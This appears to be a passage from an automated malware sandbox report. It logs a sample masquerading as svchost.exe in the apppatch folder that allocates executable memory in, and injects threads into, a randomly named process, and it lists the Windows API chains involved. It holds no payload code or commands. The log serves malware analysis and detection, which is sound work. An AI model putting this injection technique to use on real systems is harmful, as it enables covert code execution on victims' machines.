    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 13B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2230000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2980000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2320000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2990000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2870000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2580000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2800000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C00000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D30000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 820000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 31B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2870000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2CF0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2AC0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2600000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2920000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E90000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2270000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1470000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2270000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2700000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 24E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DB0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2880000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EF0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1570000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2310000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B60000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2380000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2FC0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2790000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3120000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B40000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2680000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2300000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 620000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D30000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 10F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1620000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A70000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: B80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: F50000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: FD0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 8C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DD0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: BB0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 7E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C30000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1470000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DF0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E10000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 650000 protect: page execute and read and writeJump to behavior
    Contains functionality to inject threads in other processes
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401670
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_00401670
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_02BD4CC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008F4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,5_2_008F4CC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008A4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,6_2_008A4CC0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BF4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,9_2_02BF4CC0
    Creates a thread in another existing process (thread injection)
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: 871360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: 821360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: 27C1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: D71360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: E11360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: 2171360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: 1221360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: 9D1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: 12E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: A41360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: 29B1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: 2741360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe EIP: CB1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2891360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1111360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 14B1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2211360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2EA1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2861360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 9F1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2B51360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 13B1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2231360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2981360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2321360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 29C1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2991360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2871360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2581360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2801360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: C01360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2D31360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 821360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 31B1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2871360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2CF1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2AC1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2601360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2921360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2E91360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2271360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1471360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2271360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2701360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2E81360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 24E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2DB1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2881360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 28D1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2EF1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1571360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2DE1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2311360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2B61360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2DE1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2381360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2FC1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2A61360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2791360Jump to behavior
